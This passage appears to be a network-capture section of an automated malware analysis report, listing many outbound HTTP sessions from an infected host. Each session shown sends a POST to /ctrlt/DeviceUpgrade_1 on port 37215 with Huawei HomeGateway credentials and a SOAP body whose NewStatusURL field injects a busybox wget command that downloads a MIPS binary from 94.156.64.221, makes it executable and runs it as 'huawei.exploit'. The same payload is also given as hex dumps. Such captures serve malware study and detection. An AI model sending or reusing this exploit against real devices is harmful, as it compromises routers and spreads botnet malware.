33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    197192.168.2.234038041.29.240.12737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251746893 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    198192.168.2.235756641.179.71.4337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251796007 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    199192.168.2.2335770197.81.225.10537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251831055 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    200192.168.2.235369441.23.36.6437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251867056 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    201192.168.2.233327241.104.188.25437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251905918 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    202192.168.2.233561241.125.186.11337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251939058 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    203192.168.2.235117641.144.59.16137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.251977921 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    204192.168.2.2351288156.122.101.9337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252019882 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    205192.168.2.235348241.13.150.237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252052069 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    206192.168.2.2354532197.159.210.11237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252084017 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    207192.168.2.233620441.37.220.14237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252116919 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
